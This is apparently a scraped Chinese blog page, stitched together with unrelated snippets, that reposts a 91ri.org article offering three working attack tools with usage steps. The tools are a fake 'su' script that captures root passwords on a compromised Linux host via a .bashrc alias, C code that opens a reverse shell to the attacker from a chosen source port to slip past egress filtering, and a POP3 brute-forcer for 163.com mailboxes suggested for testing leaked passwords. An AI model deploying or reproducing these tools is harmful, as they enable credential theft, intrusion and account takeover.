精华内容
下载资源
问答
  • 0×00渗透的很多时候,找到的工具并不适用,自己码代码才是王道,下面三个程序都是渗透时在网络上找不到合适工具,自己辛苦开发的,短小使用,求欣赏,求好评。0×01记录root密码小工具root.py#!/usr/bin/python...

    0×00

    渗透的很多时候,找到的工具并不适用,自己码代码才是王道,下面三个程序都是渗透时在网络上找不到合适工具,自己辛苦开发的,短小使用,求欣赏,求好评。

    0×01

    记录root密码小工具

    root.py

    #!/usr/bin/python

    import os, sys, getpass, time

    current_time = time.strftime("%Y-%m-%d %H:%M")

    logfile="/dev/shm/.su.log" //密码获取后记录在这里

    #CentOS

    #fail_str = "su: incorrect password"

    #Ubuntu

    #fail_str = "su: Authentication failure"

    #For Linux Korea //centos,ubuntu,korea 切换root用户失败提示不一样

    fail_str = "su: incorrect password"

    try:

    passwd = getpass.getpass(prompt='Password: ');

    file=open(logfile,'a')

    file.write("[%s]t%s"%(passwd, current_time)) //截取root密码

    file.write('n')

    file.close()

    except:

    pass

    time.sleep(1)

    print fail_str //打印切换root失败提示

    渗透linux拿到低权限并提权无果时,将这个程序传上去,再将一个低权限用户目录下的.bashrc添加一句alias su=’/usr/root.py’; 低权限用户su root 后 成功记录密码。密码记录路径请看脚本

    0×02

    设置源端口反弹shell

    渗透某个linux服务器,反连时目标端口为888不行,53,80还是不行,

    Ping了下百度 可以ping通,

    那真相只有一个

    服务器变态的限制了只能某些提供已某些端口为源端口去连接外面

    比如

    只允许接收对80端口的访问数据包,并以80为源端口向外回复数据。

    谷歌程序无果,自己查了相关api后写了个。

    client-port.c

    #include

    #include

    #include

    #include

    #include

    void error(char *msg)

    {

    perror(msg);

    exit(0);

    }

    int main(int argc, char *argv[])

    {

    int sockfd, portno, lportno,n;

    struct sockaddr_in serv_addr;

    struct sockaddr_in client_addr;

    struct hostent *server;

    char buffer[256];

    if (argc < 3) {

    fprintf(stderr,"usage %s hostname port LocalPortn", argv[0]);

    exit(0);

    } //三个参数,目标主机,目标主机端口,本地源端口

    portno = atoi(argv[2]);

    sockfd = socket(AF_INET, SOCK_STREAM, 0);

    if (sockfd < 0)

    error("ERROR opening socket");

    bzero((char *) &client_addr, sizeof(client_addr));

    lportno = atoi(argv[3]);

    client_addr.sin_family = AF_INET;

    client_addr.sin_addr.s_addr = INADDR_ANY;

    client_addr.sin_port = htons(lportno); //设置源端口

    if (bind(sockfd, (struct sockaddr *) &client_addr,

    sizeof(client_addr)) < 0)

    error("ERROR on binding");

    server = gethostbyname(argv[1]);

    if (server == NULL) {

    fprintf(stderr,"ERROR, no such host ");

    exit(0);

    }

    bzero((char *) &serv_addr, sizeof(serv_addr));

    serv_addr.sin_family = AF_INET;

    bcopy((char *)server->h_addr,

    (char *)&serv_addr.sin_addr.s_addr,

    server->h_length);

    serv_addr.sin_port = htons(portno);

    if (connect(sockfd,&serv_addr,sizeof(serv_addr)) < 0) //连接

    error("ERROR connecting");

    dup2(fd, 0);

    dup2(fd, 1);

    dup2(fd, 2);

    execl("/bin/sh","sh -i", NULL);//执行shell

    close(fd);

    }

    用法:

    gcc client-port.c -o port

    chmod +x port

    ./port 你的IP 你的监听端口 本地的源端口

    如 ./port http://www.91ri.org  80  80

    成功反弹shell 提权成功

    0×03

    邮箱爆破脚本

    某个时候 需要爆破一批邮箱

    Burp163.pl

    #!/usr/bin/perl

    use Net::POP3;

    $email="pop.163.com"; //设置pop服务器地址 qq为pop.qq.com

    $pop = Net::POP3->new($email)or die("ERROR: Unable to initiate. ");

    print $pop->banner();

    $pop->quit;

    $i=0;

    open(fp1,"user.txt");

    @array1=;

    open(fp2,"pass.txt");

    @array2=; //从文件中获取邮箱用户名及密码

    foreach $a(@array1) {

    $u=substr($a,0,length($a)-1);

    $u=$u."@163.com";

    foreach $b(@array2) {

    $p=substr($b,0,length($b)-1);

    print "cracked with ".$u."-----".$p."n";

    $i=$i+1;

    $pop = Net::POP3->new($email)or die("ERROR: Unable to initiate. ");

    $m=$pop->login($u,$p); //尝试登录邮箱

    if($m>0)

    {

    print $u."------------".$p."----"."success"."n";

    $pop->quit;

    } //成功登录

    else

    {

    print $u."------------".$p."----"."failed"."n";

    $pop->quit; //登录失败

    }

    }

    }

    print $i;

    用法 将要爆破的邮箱的pop服务器写入下面这一行 默认是163邮箱

    $email="pop.163.com";

    再将去除掉@后面部分的邮箱地址比如lusiyu@163.com 去除后lusiyu存进去

    同目录user.txt中吗,再将字典存进去pass.txt

    你会说

    这个有点鸡肋吧 万一邮箱的密码很复杂

    呵呵

    搞到了一个小站的数据,

    用这个程序批量测试密码是否就是邮箱密码 呵呵

    我啥都没说。

    0×04

    这三个程序仅供技术研究,如读者用于违法行为,本人概不负责。

    赏金发放情况:

    本文获得赏金150RMB,已于4.15日发放到作者账号。

    征稿启事:

    91RI一直相信“你不与人分享,谁与你分享”,分享的确是件非常有意义的事情。为了让优秀的同学有 地方分享自己的独到见解,也为了让更多同学从分享中受益,同时我们也希望给那些愿意分享的小伙伴们一点点心意作为感谢,所以我们隆重了推出“有奖征文”活 动!本次活动的详情可以围观《征稿启事》

    展开全文
  • 你可能想要Ruby,因为它是Metasploit的本地语言,它是事实上标准的开源渗透测试框架. Ruby会给你:> Metasploit’s框架,操作码和shellcode数据库> Metasploit针对原始802.11工作的Ruby lorcon绑定.> ...

    你可能想要Ruby,因为它是Metasploit的本地语言,它是事实上标准的开源渗透测试框架. Ruby会给你:

    > Metasploit’s框架,操作码和shellcode数据库

    > Metasploit针对原始802.11工作的Ruby lorcon绑定.

    > Metasploit针对802.11客户端重定向的KARMA绑定.

    > Libcurl和net / http用于Web工具编写.

    > EventMachine用于Web代理和模糊测试工作(或RFuzz,它扩展了着名的Mongrel网络服务器).

    > Metasm用于生成shellcode.

    > Distorm for x86反汇编.

    > BinData用于二进制文件格式模糊测试.

    第二位是Python. Python中提供的测试库比Ruby中更多(但不足以抵消Metasploit).商业工具也倾向于支持Python – 如果你是Immunity CANVAS或CORE Impact客户,你需要Python. Python为您提供:

    > Twisted用于网络访问.

    > PaiMei用于程序跟踪和可编程调试.

    > CANVAS和Impact支持.

    > Dornseif’s用于远程调试的firewire库.

    > Ready integration with WinDbg用于远程Windows内核调试(在Ruby中用于内核调试仍然没有好的答案,这就是为什么我偶尔也会使用Python).

    > Peach Fuzzer和Sully进行模糊测试.

    > SpikeProxy用于网络渗透测试(也称为OWASP Pantera).

    不出所料,很多网络工作都使用Java工具.事实上的标准web pentest工具是Burp Suite,它是一个Java swing应用程序. Ruby和Python都有Java变体,您可以使用这些变体来访问这样的工具.此外,Ruby和Python都提供:

    >直接与libpcap集成以进行原始数据包工作.

    >加密的OpenSSL绑定.

    > IDA Pro扩展.

    >用于API访问的成熟(或至少是合理的)C外部函数接口.

    >用于UI工作的WxWindows,以及用于Web UI的不错的Web堆栈.

    使用这两种语言都不会出错,但是对于主流的pentest工作,Metasploit可能会摒弃所有Python优势,而目前,对于x86逆转工作,Python的优秀调试接口可以完全消除所有Ruby的好处.

    另外:它是2008年.它们不是“脚本语言”.他们是编程语言. 😉

    展开全文
  • 渗透测试从互联网找到了入侵内网的入口点之后剩下的就内网渗透测试了。  有人说到了内网还不容易,随便拿个hscan一抓一大把弱口令。我同意这个看法,但是在我看来,内网环境复杂得多,要想精确获取自己想要的...
    展开全文
  • http://www.2cto.com/Article/201408/322754.html
    http://www.2cto.com/Article/201408/322754.html
    展开全文
  • 本文将讲述如何使用Python编写SSH弱口令读取文件Flag内容 安装Paramiko模块 paramiko模块,基于SSH用于连接远程服务器并执行相关操作。 编写脚本 import paramiko # 创建ssh连接 sshc = paramiko.SSHClient() ...
  • 面向渗透测试者的Python 概述 开始使用Python进行渗透测试和红队参与非常容易! 此存储库只是一小部分随机脚本,可以帮助您入门。 带给您的是: 范例:Mike Felch(@ustayready)和Joff Thyer(@joff_thyer) 提供...
  • 学员要求:学习计算机最为基础的内容(开关机、...课程内容涉及众多,包括脚本技术、操作系统技术、以及数据库技术,从原理深入揭示Web安全原理与提升。目前课程处于开发阶段,后期会补全课程大纲。欢迎大家收藏,支...
  • 与爬虫类似,进行Web渗透测试也需要对Web应用进行请求,与网站进行交互或者是遍历网站路径亦或是测试SQL注入漏洞,还是上传带有后门的表单文件。requests模块支持多种HTTP请求方式,基本上涵盖了...
  • dvwa是一个开源的由php语言编写、使用mysql...本文主要内容是使用python编写dvwa登录的暴力破解脚本。dvwa的本地搭建这里就不赘述了,网上有很多介绍的文章大家可自行度娘,本次环境使用的是docker技术在kali li...
  • 0x00 - 前言这是一个跟Metasploit类似的基于web渗透测试平台,平台可以允许加入自定义脚本,只需要提交自定义的脚本并编写脚本对应的web界面模板就可以直接在平台上进行使用,...
  • 就我而言,Python和Ruby在很大程度上是混搭的。当你真正开始做的时候,他们基本上都做同样的事情,这都取决于你的喜好。...它对socket脚本、操作数据很有帮助,并且因其出色的regexp处理而闻名。我喜欢...
  • 用于测试脚本。 fb-brute.pl =适用于Facebook的Bruteforce hash_id_v1.1.py =哈希标识符 painel.pl =管理员控制面板查找器 slowloris.pl =拒绝服务 g3m =拒绝服务 如何安装和使用 fb-brute.pl $ sudo chmod +x ...
  • 1、首先你必须要有一个python环境,没有的这里下载,推荐使用python 2.7.10 2、下载subDomainsBrute到本地,下载地址在下面: https://github.com/fei9747/subDomainsBrute 3、安装所需要的库,直接使用pip安装...
  • 此外还有一些高级审计技术(伪造扫描段身份、绕过防火墙等)、脚本引擎NSE等。 安装python-nmap,须先安装nmap。 Windows直接下载安装 Linux需要如下命令: sudo apt-get install nmap sudo pip install pytho...
  • python渗透

    2017-11-05 17:27:00
    计划写一个获取qq空间加密相册的工具。...自己新建一个加密相册,通过工具测试,看看成功或失败的response内容的差别。 扩展工具,可以进行多种密码类型的组合 记录: https://h5.qzone.qq.com/proxy/do...
  • Python脚本

    2018-08-16 09:03:01
    这是一个Python脚本,可用于渗透测试。通过获取网页的user_token值,破解密码。
  • 一、信息搜集--py端口扫描小脚本端口扫描是渗透测试中常用的技术手段,发现敏感端口,尝试弱口令或者默认口令爆破也是常用的手段,之前自学python时候百度着写了个小脚本。端口扫描小脚本:对于端口扫描技术,其实分...
  • 针对零基础入门的小伙伴,教程涉及Python编程入门,kali linux渗透测试从入门到实践等内容。让大家即学会常用的渗透测试工具,同时也掌握一定的编程能力,不做别人眼中的脚本小子,真正的实现从小白到大牛的转变。
  • Git仓库地址: ...双击运行Start.bat 或 使用命令行执行python 脚本名.py +-------------------------------------------------------------------------------------------------------------+ | ...
  • 本篇将会涉及:requests...与爬虫类似,进行Web渗透测试也需要对Web应用进行请求,与网站进行交互或者是遍历网站路径亦或是测试SQL注入漏洞,还是上传带有后门的表单文件。requests模块支持多种HTTP请求方式,基本上...
  • 所以,为了拒当脚本小子,往后我的博客会用python来写一些渗透测试中常见的工具。代码不在多而在于精,我的主要目的是用最简单的代码实现强大的功能。 我用的IDE是pycharm,用的python3(首先导入urllib3包,用python...
  • python是门简单易学的语言,强大的第三方库让我们在编程中事半功倍,今天,我们来谈谈python多线程在渗透测试中的应用,本文,我们将编写一个简易c段存活主机扫描脚本,以及一个python版本的多线程御剑--目录扫描...
  • Scapy扫描——python脚本 #!/usr/bin/python # -*- coding: utf-8 -*- # 该脚本用于识别僵尸机,并控制僵尸机对目标主机进行端口扫描 from scapy.all import * import time import sys def IsZombie(zombie_...
  • 一、信息搜集--py端口扫描小脚本端口扫描是渗透测试中常用的技术手段,发现敏感端口,尝试弱口令或者默认口令爆破也是常用的手段,之前自学python时候百度着写了个小脚本。端口扫描小脚本:#coding: utf-8import ...
  •  (2)使用python脚本实现 实验环境:  kali(攻击者): 192.168.37.131  Windows 2008(目标主机) :192.168.37.128  win xp (僵尸机) :192.168.37.130 脚本:zombie.py #!/usr/bin/...
  • 渗透测试过程中,经常会遇到有的站点未对用户登录失败的次数进行限制,导致可以直接使用 BurpSuite 工具进行暴力破解。有的站点虽然可以爆破,却在前端使用JS代码对密码进行了加密,如果是常规的加密或者哈希算法,...

空空如也

空空如也

1 2 3 4 5 ... 10
收藏数 195
精华内容 78
关键字:

python渗透测试脚本

python 订阅